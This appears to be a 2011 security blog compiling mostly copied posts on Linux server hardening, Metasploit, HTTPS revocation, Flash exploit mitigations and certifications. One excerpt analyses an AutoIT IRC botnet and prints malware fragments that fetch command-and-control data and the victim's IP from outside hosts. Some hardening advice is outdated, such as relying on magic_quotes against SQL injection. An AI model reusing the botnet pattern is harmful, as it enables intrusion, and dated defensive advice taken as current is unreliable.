Mar 25, 2011

Howto: Upgrade Firefox3.6.15 to Firefox4 In Backtrack4

1. download Firefox4 from [ OR URL:]
     $ wget
2. extract it
     $ tar xvf  firefox-4.0.tar.bz2
3. delete you own firefox3.6.15
     $ rm -rf /opt/firefox/
4. move it to the /opt
     $ mv firefox /opt/
5. try to execute and test the version of firefox.
     $ firefox

How to Secure Linux Servers

Basic Linux Server Security

Install Firewall (APF or CSF Firewall with BFD)
ModSecurity (Web application firewall)
ModEvasive (Prevent DDOS attacks)
Harden SSH server
Fix Open DNS Recursion
Install RKhunter
Install ClamAV (Antivirus)
XInet Servers Hardening (Disable Telnet/Finger or unwanted services)
Securing PHP
PortsEntry (tool to detect portscans)
Harden host.conf (against IP spoofing)
Check User Uploaded files
Secure /tmp Folders (noexec, nosuid)

This tutorial guide covers only basic linux server security tips intended for linux learners. I am writing this guide assuming that you are running Centos 5 or later versions.

Install Firewall

The very first first step on securing a server is installing a firewall (atleast IP tables based) to close all unused or unwanted ports. Once the firewall is installed it is often considered 50% of work done. You can install CSF firewall or APF firewall. Often BFD (brute force detection) utilities comes with firewall.
We will install CSF (Config security firewall) as it is easy to install with plenty of features and easily integrated to CPanel (if you are running)
tar zxf csf.tar.gz
sh /csf/
Follow the installer and once installed, you can start the firewall.
csf -s
// start the firewall
csf -r
// restart the firewall
csf -f
// flush the rules or stop the firewall.
You can see the full installing tutorial here

Harden SSH server

Very often you will see SSH attacks from various bots trying to get access to your server by connected to port 22 with unlimited number of login attempts to break in to your system. Imagine attacks coming from different IPs can put lot of load in you server. You can trace those failed attempts by checking your log file
cat /var/log/secure
cat /var/log/messages
To harden your SSH server,
  • Run SSH on other port rather than default port 22
  • Disable Root login
  • Use only protocol 2
  • Enable Public key authentication.
You can see the full SSH hardening tutorial here

Disable Telnet & Other Unused Services

You may want to disable services like telnet, finger and other unwanted services running on your server with xinet.
nano /etc/xinetd.d/telnet
// OR
nano /etc/xinetd.d/krb5-telnet
look for lines disable=no and change to disable=yes
chkconfig telnet off

Hardening PHP for Security

PHP is the most popular scripting language for apache and mysql. You will need to disable system level functions in the php configuration file.
nano /usr/local/lib/php.ini
Look for the lines and make sure you have the lines as below..
disable_functions = exec,system,shell_exec,passthru
register_globals = Off
expose_php = Off
magic_quotes_gpc = On
It is best to keep magic_quotes to on as otherwise you forms using POST may be used for SQL injection attacks.

Disable Open DNS Recursion (DNS Server)

If you are running bind DNS server, then you might want to check your dns server statistics with You dont want to allow recursive lookups to performed on your server other than local IP. It can also slowdown your server.
nano /etc/named.conf
Under Options { place a line
Options {
recursion no;
Then restart the bind
service named restart
You will also need to restrict zone transfers and notifications if you are running Bind 9. Refer to: dns server hardening

Install Mod_Security

ModSecurity is a free open source web application firewall which can help you to guard against LFI (local file inclusion attacks) and SQL injection vulnerabilities.
CPanel Installation:
Just go to Cpanel WHM > Plugins > Enable Mod_Security > Save
Source Installation:
That should install mod security in your cpanel. Under apache it should show under installed modules if you run test.php with phpinfo() in it. Try adding some mod security rules. Installing mod_security could be sometimes complicated. Dont use apxs for compiling mod_security as it causes number of problems.
Note: Mod_security needs libxml2 and http-devel libraries before it can be installed. It also requires mod_unique_id enabled in apache modules. To install mod_unique_id, you have to place
LoadModule unique_id_module modules/
in your httpd.conf file.
yum install libxml2 libxml2-devel httpd-devel
Download the latest version of mod_security for apache2 from
tar zxf modsecurity-apache_2.5.4.tar.gz
cd modsecurity-apache_2.5.4
cd apache2
If you cannot find ./configure then you will need to edit Makefile and make change to top_dir = /usr/lib/httpd (for centos)
make install
Next, copy the rule files depending on which you want (you can also select minimal rules file which comes with source). Make a directory named modsecurity under /etc/httpd/conf and copy all the modsecurity rules there. Finally include those files in the httpd.conf file
# /etc/httpd/conf/httpd.conf
LoadModule unique_id_module modules/
LoadFile /usr/lib/
LoadModule security2_module modules/
Include conf/modsecurity/*.conf
/etc/init.d/httpd restart
Log Files
Watch for log files to detect any errors or intrusion activity

If you get any errors, i have compiled a list of errors while compiling. see here

Install Mod_Evasive

ModEvasive module for apache offers protection against DDOS (denial of service attacks) in your server.
tar zxf mode_evasive-1.10.1.tar.gz
cd mod_evasive
then run the following command for apache2...
> /usr/sbin/apxs -cia mod_evasive20.c
Once mod evasive is installed, place the following lines in your /etc/httpd/conf/httpd.conf
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 10
Follow the instructions in the README for more tuning of mod_evasive. This will compile, install and activate the module in your server.

Install RkHunter (Rootkit)

RkHunter is a rootkit scanner scans for vulnerabilities, insecure files, backdoors in your system and reports it so that you can further harden the server. Installing RkHunter is very easy!
yum install rkhunter
To run checks in your system
rkhunter --checkall
rkhunter -c
You can find what command options are available under rkhunter by issuing this help command
> rkhunter --help

Install PortsEntry

Portsentry is a tool to detect port scans and log it. Download the sorce package of portsentry from
wget http://path/to/portsentry-1.2.tar.gz
tar zxf portsentry-1.2.tar.gz
make linux
make install
If you get errors like while compiling
make linux
gcc -O -Wall -DLINUX -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \
./portsentry_io.c ./portsentry_util.c
./portsentry.c: In function 'PortSentryModeTCP':
./portsentry.c:1187: warning: pointer targets in passing argument 3 of 'accept' differ in signedness
./portsentry.c: In function 'PortSentryModeUDP':
./portsentry.c:1384: warning: pointer targets in passing argument 6 of 'recvfrom' diffe r in signedness
./portsentry.c: In function 'Usage':
./portsentry.c:1584: error: missing terminating " character
./portsentry.c:1585: error: 'sourceforget' undeclared (first use in this function)
./portsentry.c:1585: error: (Each undeclared identifier is reported only once
./portsentry.c:1585: error: for each function it appears in.)
./portsentry.c:1585: error: expected ')' before 'dot'
./portsentry.c:1585: error: stray '\' in program
./portsentry.c:1585: error: missing terminating " character
./portsentry.c:1595: error: expected ';' before '}' token
make: *** [linux] Error 1
To fix:
Open portsentry.c and look for the following line. There will be a extra carriage return breaking the line and you have to delete the carriage return and make single line. It should look like below.
printf ("Copyright 1997-2003 Craig H. Rowland <craigrowland at users dot sourceforget dot net>\n");
Then run make and make install. That should fix it!
To launch portsentry
/usr/local/psionic/portsentry/portsentry -stcp
/usr/local/psionic/portsentry/portsentry -sudp
check the log files /var/log/secure on what portsentry is active or not.

Prevent IP Spoofing

IP spoofing is a security exploit and can be prevented from placing nospoof on in host.conf file. Edit the host.conf file and place the following lines. If you run dns bind, give it preference.
order bind,hosts
nospoof on

Install ClamAV

Antivirus protection is the last thing you need for your security to protect against worms and trojans invading your mailbox and files! Just install clamav (a free open source antivirus software for linux). More information can be found on clamav website
yum install clamav
Once you have installed clamav in your centos…here are some of the basic commands using the software..
1. To update the antivirus database
> freshclam
2. To run antivirus
clamav -r /home
3. Running as Cron Daily Job
To run antivirus as a cron job (automatically scan daily) just run crontab -e from your command line. Then add the following line and save the file.
02 1 * * * root clamscan -R /var/www
This will run the cron job daily @ 1.02 AM by scanning the public html. You can change the folder to whatever you want for mail etc.
Thats it! Always keep an eye for log files for any attacks or error messages!


OWASP Top 10 Tools and Tactics

Following is a risk and tool matrix.
RISK                                                         TOOL
A1: Injection                                          SQL Inject Me
A2: Cross-Site Scripting (XSS)                              ZAP
A3: Broken Authentication and Session Management           HackBar
A4: Insecure Direct Object References                       Burp
A5: Cross-Site Request Forgery (CSRF)                   Tamper Data
A6: Security Misconfiguration                              Watobo
A7: Insecure Cryptographic Storage                          N/A
A8: Failure to Restrict URL Access                      Nikto/Wikto
A9: Insufficient Transport Layer Protection                Calomel
A10: Unvalidated Redirects and Forwards                    Watcher

If you want to read detail, please go to the Source

Creating a Simple Botnet Using the AutoIT Scripting Language

AutoIT, a free automation language for Windows platform-based development, is often used for scripting Windows-based applications and sometimes misused for creating malware. AutoIT scripts can be compiled into a compressed, standalone executable which will run without an interpreter. Auto2Exe is the application used to compile the AutoIT script into a standalone executiable.

MessageLabs Intelligence recently discovered an AutoIT Trojan using IRC (online chat) to connect an infected machine to a command and control channel without the user's knowledge. The malware is sent in the form of an enticing message containing an archive of .GIF files with a subject like "My Photos" to around 50 recipients to lure them into opening the attachment.
[Figure 1 - Example Email]
One of the files, disgused as a .GIF image is actually an executable using an icon for an image, and may give the illusion that the exeutable is a broken image (as seen in figure 2, below). If the user tries to open the file, it will execute and give the appearance that something hasn’t worked correctly as no image is displayed; the the user may draw the conclusion that it is nothing more than a corrupt image. 

[Figure 2 - Content of Attached Archive File]

Once the executable is triggered, it connects to a website based in Vietnam (.vn) and downloads instructions to connect to an IRC server for its command and control. These are saved as a plain text file and used to join the correct channel.

[Figure 3 - Text File Being Downloaded, Identifying Command and Control Channel]
Once connected, further instructions may be downloaded as the infected machines are now joined to a small botnet, or robot network. A botnet may be used to conduct Distributed Denial of Service (DDoS) attacks, sending spam, hosting websites, targeting other computers by exploiting existing vulnerabilities and pushing adware or spyware on to infected machines.

Below are some fragments of the script code used:
INETGET ( "http://[removed].vn/[removed].php" , @SYSTEMDIR & "\[removed].txt" , 1 , 0 )
The function is used to download the IRC details and parsed later to extract the IRC server name, port to connect to, channel name and version of the malware application (presumably used to provide an update facility).

Once it has collected all this information, it then tries to identify the infected machine’s external IP address by contacting another website for this purpose.
INETGET ( "http://[removed].com/" , @SYSTEMDIR & "\ip.txt" , 1 , 0 )
The above command will get the IP address of the machine and will store into the file ip.txt.
It then creates nickname for the computer to connect to the channel and is a combination of randomly generated letters with a common tag:
$NICK = "[REMOVED]-" & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & 
        CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) &
        CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) )
After this it then connects to the IRC channel in the background to join the botnet.

 You can read full article at the Source.

Mar 24, 2011

Twitter tests XSS attack prevention on its mobile website

Twitter has been testing and has now implemented Content Security Policy - a new standard developed by Mozilla to block cross site scripting (XSS) attacks - on its mobile website.

"When a website enables CSP, the browser ignores inline Javascript and only loads external assets from a set of whitelisted sites. Enabling CSP on our site was simply a matter of including the policy in the returned headers under the CSP defined key, 'X-Content-Security-Policy'."

"The policy also contains a 'reporting URI' to which the browser sends JSON reports of any violations. The testing executed in the last few weeks revealed situations that have triggered a report without being actually malicious attempts. For example, it turns out that a number of popular Firefox extensions insert Javascript on page load and that various ISP insert Javascript or change image tags so that they point to their caching servers. Twitter resolved this triggering problem by mandating SSL for Firefox 4 users.

 You can read full article at the Source.

Mar 21, 2011

Five security secrets your IT administrators don't want you to know

Here are five facts about IT security that your administrators probably don't want you to know.

Most passwords never change

Sensitive accounts like administrator logins, embedded application-to-application passwords, and privileged service accounts often keep the same passwords for years because IT staff may not have the tools to track and change them. And, because systems and applications often crash when IT personnel attempt to change interdependent credentials, many of your organization’s most privileged logins can go unchanged for extended periods of time.

Ad-hoc change processes and handwritten scripts might succeed in updating the passwords of some types of privileged accounts, but unless your organization has invested in privileged identity management software you can be sure that many of the passwords that grant access to your organization’s most sensitive information are never changed. This means that access to this data – whether by IT staff, programmers, subcontractors and others who ever had access – will continue to spread over time.

Too many individuals have too much access

As a result contractors, service providers, application programmers, and even end-users are likely to have the ability to gain privileged access using credentials that may never change. Unless you’ve got technology in place to track privileged logins, delegate access, and change these powerful credentials after each time they’re used you’ll never know who now has access.

Your CEO's data isn't private

Anyone with knowledge of the right credentials can gain anonymous access to read, copy and alter data – including the communications and application data belonging to your executive staff.

IT auditors can be misled

IT staff have limited time to complete higher-visibility projects that influence performance ratings and paychecks, so in most cases you can forget about them fixing any security holes that your auditors fail to notice.

Security often takes a back seat

Is your IT administrators’ pay structure tied to security? No? Then they’re probably not as proactive as you might expect when it comes to securing your network. Most IT administrators won’t tell you about the security vulnerabilities they discover in the course of their jobs because they’re not paid to fight losing battles to gain resources necessary to close each discovered security gap.

Because pay packages are rarely tied to safeguarding your network, your IT administrator is also probably not taking the initiative to update her technical skills when it comes to security. As a result, even when budgets allow for purchases of new security technologies, your staff may have no clue how to actually use these new tools effectively.


About my blog and my posts in this blog.

Someone misunderstand about the posts in this blog that I wrote by myself.

Some posts I wrote it by myself, and some posts I copy them from another websites or blogs.If that posts are from another websites, I will post it with "Source:The Original Post" that tell you where I got the posts.I want to tell every writers of all articles that I bring to post here. I'm really not intent to take there to my own articles. I will reform next times when I posts "Source:" with the quote to clearly understand which article is my, or not.

Sorry again for all writers that misunderstand me.

Howto: Add Unstable Modules into Metasploit

After I read "" from Tweet-HDMoore. I try to do it by myself but download into My metasploit path like this.

1. cd /pentest/exploit/framework3
2. svn co /pentest/exploits/framework3/modules/unstable/
3. msfconsole

Mar 20, 2011

HTTPS and Revocation

When an HTTPS certificate is issued, it's typically valid for a year or two. But what if something bad happens? What if the site loses control of its key?
In that case you would really need a way to invalidate a certificate before it expires and that's what revocation does. Certificates contain instructions for how to find out whether they are revoked and clients should check this before accepting a certificate.
There are basically two methods for checking if a certificate is revoked: certificate revocation lists (CRLs) and OCSP. CRLs are long lists of serial numbers that have been revoked while OCSP only deals with a single certificate. But the details are unimportant, they are both methods of getting signed and timestamped statements about the status of a certificate.
But both methods rely on the CA being available to answer CRL or OCSP queries. If a CA went down then it could take out huge sections of the web. Because of this, clients (and I'm thinking mainly of browsers) have historically been forgiving of an unavailable CA.
But an event this week gave me cause to wonder how well revocation actually works. So I wrote the the world's dumbest HTTP proxy. It's just a convenient way to intercept network traffic from a browser. HTTPS requests involve the CONNECT method, which is implemented. All other requests (including all revocation checks) simply return a 500 error. This isn't even as advanced as Moxie's trick of returning 3.
To be clear, the proxy is just for testing. An actual attack would intercept TCP connections. The results:
Firstly, IE 8 on Windows 7:
No indication of a problem at all even though the revocation checks returned 500s. It's even EV.
(Aside: I used Wireshark to confirm that revocation checks weren't bypassing the proxy. It's also the case that SChannel can cache revocation information. I don't know how to clear this cache, so I simply used a site that I hadn't visited before. Also confirming that a cache wasn't in effect is the fact that Chrome uses SChannel to verify certificates and Chrome knew that there was an issue..)
Firefox 3.6 on Windows 7, no indication:
Chrome 12 on Windows 7:
There's something at least! We can click on it...
So Chrome has an indication but it's the same indication as mixed-content and I suspect that rather a lot of people will ignore it. There is one saving grace, Chrome implements HSTS and for HSTS sites, revocation failure is fatal:
On other platforms, the story is much the same. Safari doesn't indicate that anything is wrong, nor does Firefox 4 on OS X, nor Firefox 3.6 on Linux. Chrome on Mac is the same as Windows, but on Linux doesn't indicate and doesn't protect HSTS sites. (Chrome Linux's behaviour is due to a limitation in NSS as I understand it.).
So, what's the effect? Well it depends where an attacker is. If the attacker is spoofing a site and is situated close to the site then they can attack all users, because they can get all the traffic destined for the site. However, such an attacker probably can't intercept traffic to the CA's servers, so revocation will actually work because the users will receive a firm ‘revoked’ message from the CA. If the attacker is close to the user, then they can only attack a smaller number of users, but they can intercept traffic to the CA and thus defeat revocation. Attacks in Tunisia and only open WiFi networks are the sort of attacks which can defeat revocation.
So should browsers be stricter about revocation checking? Maybe, but it does mean that a CA outage would disable large parts of the web. Imagine if Verisign corrupted their revocation database and were down for six hours while they rebuilt it. An global outage of large parts of the HTTPS web like that would seriously damage the image of web security to the point where sites would think twice about using HTTPS at all.
(You can configure Firefox to be strict about checking if you wish: security.OCSP.require in about:config.)
A much better solution would be for certificates to only be valid for a few days and to forget about revocation altogether. This doesn't mean that the private key needs to change every few days, just the certificate. And the certificate is public data, so servers could just download their refreshed certificate over HTTP periodically and automatically (like OCSP stapling). Clients wouldn't have to perform revocation checks (which are very complex and slow), CAs wouldn't have to pay for massive, DDoS proof serving capacity and revocation would actually work. If the CA went down for six hours, nobody cares. Only if the CA is down for days is there a problem. If you want to “revoke” a certificate, just stop renewing it.


Blocking Exploit Attempts of the Recent Flash 0-Day

First, customers using Microsoft Office 2010 are not susceptible to the current attacks.  The current attacks do not bypass the Data Execution Prevention security mitigation (DEP).  Microsoft Office 2010 turns DEP on for the core Office applications, and this will also protect Flash Player when it is loaded inside an Office application.  In addition to that, users of the 64 bit edition of Microsoft Office 2010 have even less exposure to the current attacks as the shellcode for all the exploits we’ve seen will only work on a 32 bit process.  What’s more, if an Office document originates from a known unsafe location such as email or the internet, Office 2010 will activate the Protected View feature.

Protected View uses a sandbox that greatly limits the ability of an application to interact with other processes and the system.  Flash content embedded in an Office document originating from an unsafe location runs inside Protected View.  For more information about this feature of Office 2010, please refer to “What is Protected View?”.

For users who want additional protections as well as users of Microsoft Office prior to 2010, the Enhanced Mitigation Experience Toolkit (EMET) can help.  Turning on EMET for the core Office applications will enable a number of security protections called security mitigations.  The exploits we’ve seen so far are broken by three of these mitigations: DEP, Export Address Table Access filtering (EAF), and HeapSpray pre-allocation.  EMET is of value even to Microsoft Office 2010 as it has the first of the three enabled by default, but does not have the second or third ones.

To be protected by EMET, there are a few steps you need to follow.  You first need to download the tool, install it, and then finally configure it to protect an application.  It’s a good idea to configure EMET to protect not just Excel, but all of the Office applications as even though the attacks we’ve seen only target Excel, Flash Player can also be hosted in other Office applications as well.  Configuring EMET for the Office applications is done through the following steps:
  1. Launch the EMET application from the start menu
  2. Click on the “Configure Apps” button
  3. Click the “Add” button
  4. Navigate to where you have Microsoft Office installed and select one of the core office apps.  For example this might be C:\Program Files (x86)\Microsoft Office\Office12\excel.exe.
  5. Select “Open”
  6. Repeat steps 4 through 5 for the other core office applications
  7. Select “Ok”
  8. Restart any of the Office applications that are currently running

Since Flash Player can also be hosted in a web browser, you may wish to turn on EMET for the browser you use.  This can be done by adding the browser executable to the list of protected applications per the above steps.  In general it is a good idea to utilize a browser that opts into DEP by default such as Internet Explorer 8 and 9 (as well as several third party browsers).

Beyond EMET, there is a workaround that Office 2007 users can use to prevent the Flash Player (as well as other ActiveX controls) from loading inside an Office application.  This is done by changing the ActiveX setting in the Trusted Center to “Disable all controls without notification” as is shown in the screenshot below.

The ActiveX setting in the Trust Center can also be set via group policy or registry.   For more information, please refer to “Security policies and settings in the 2007 Office system”.   As a final note, please be aware that the setting has the potential to break add-ons for Microsoft Office.  It is a good idea to test any add-ons you use before making this change too widely.


7 Security Tips For Smartphone

As the mobile is the most common device to access the web world wide, Smart phones has been changed the way of mobility and the user's using their smart phones for the tasks such as online shopping, accessing bank account, connecting their friends and social networking etc.

Beside each and everything you should secure your online information, smartphone user's identity can be stolen and hacked. There are some security tips for smartphone user's to keep secure their self.

Updates for your phone

Keep up to date your phone so that the latest patch of the software's be install, just like any other operating system, desktop computer and laptop, keep update your software's as a first line defense against hackers and malware.

Public Place

Now a days WiFi networks have become ubiquitous but unfortunately viewing your important information on public WiFi is not secure. You should avoid your email program, social networking sites, online shopping while connecting on public network.

Use Password

You should set a password for your phone and enabling the screen auto-lock time to be three minutes is the simplest way to secure your phone, in case if it stolen than nobody can access into your personal information.

Enable a Wipe feature
In case if you find yourself and your cell phone in difficult situation means if you have lost your phone and you would not able to get it back, than it is good practise to clean all the information store in the cell phone, you can use a wipe application clear your data. Try to download the wipe application that can able to clean your external card too.

Use Encryption  
As you know that the cryptography is the art of secret communication, so you must enable encryption when available. Although encryption is not available in all plate form, but if you find this feature you must use it.

Use Antivirus    
Mobile viruses and malware is developing daily and more quickly, due to the increasing usage of smartphones for banking and other purpose, the attacker can affect your phone by back door so you must secure your phone from these activities. Use the appropriate antivirus for your smartphone operating system. For a variety of antivirus list about android operating system click here.  

Avoid Phishing SMS
Smishing is a term that is a combination of SMS (Short Message Service) and phishing, you must beware and know about these activities. In smishing a miscellaneous user send a message linked with a website and they might ask you to enter your sensitive information on the given web page(may be a fake page).


Top 5 IT Security Certifications for 2011

In today’s tough IT market having a security certification that recruiters want can mean the difference between getting that next job or not. “A certification today is like a college degree,” says Grad Summers, Americas leader for information security program management services at Ernst & Young. “You may not hire a candidate just because they have one, but it is something that you come to expect in this field.”
Here are the top five security certifications for 2011, compiled by scanning job boards and interviewing IT security recruiters and employers:
Vendor Certifications
A growing need for hands-on network engineers, along with social computing and Web 2.0 technology, has propelled network security even further. Vendor certifications including Cisco’s Certified Network Associate Certification (CCNA), Microsoft’s Certified Systems Engineer (MCSE) with focus on security and Check Point’s Certified Security Expert (CCSE) top the list as organizations within banking, government and healthcare that look to fill open positions including network, system administrators and architects.
The popularity of the Certified Information Systems Security Professional is high within the IT security community as it provides the basis of security knowledge. “We feel safe hiring candidates carrying this validation,” says Ellis Belvins, division director at Robert Half International, a professional staffing consultancy, adding that the certification demonstrates the security professionals’ high proficiency, commitment and deeper understanding of security concepts, principles and methodologies.
CISSP is viewed as the baseline standard for information security professions in government and industry. Companies are beginning to require CISSP certification for their technical, mid-management and senior management IT security positions. This certification is offered through (ISC) 2, the not-for-profit consortium that offers IT security certifications and training.
Certified Ethical Hacker is gaining popularity as organizations focus in securing their IT infrastructure and networks from internal and external attacks. CEH is offered by EC-Council and its goal is to certify security practitioners in the methodology of ethical hacking. This vendor-neutral certification covers the standards and language involved in exploiting system vulnerabilities, weaknesses and countermeasures. CEH basically shows candidates how the attacks are actually done. It also attempts to define the legal role of ethical hacking in enterprise organizations.
Some employers aggressively look to hire candidates with CEH validation for hands on security operations and intelligence activities. “In 2011, we see the need for very specific skill sets which can be obtained through training and certifications such as the CEH,” says Vernon Ross, director of learning and organizational capability at Lockheed Martin Information Systems and Global Solutions.
Certified Information Security Manager is significantly in demand as the profession focuses on the business side of security. CISM offered by ISACA addresses the connection between business needs and IT security by focusing on risk management and security organizational issues. “ISACA’s CISM are a few that are on our radar for 2011,” Summers says.
CISM is ideal for IT security professionals looking to grow and build their career into mid-level and senior management positions. In fact, the CISM earned a place on the list of highest paying IT security certification by the 2010 IT Skills and Certifications Pay Index from independent research firm Foote Partners.
The demand is rising for Global Information Assurance Certification (GIAC) in specific disciplines such as digital forensics, intrusion detection, incident handling, security operations and application software security.

If you want to read full article, please go to source.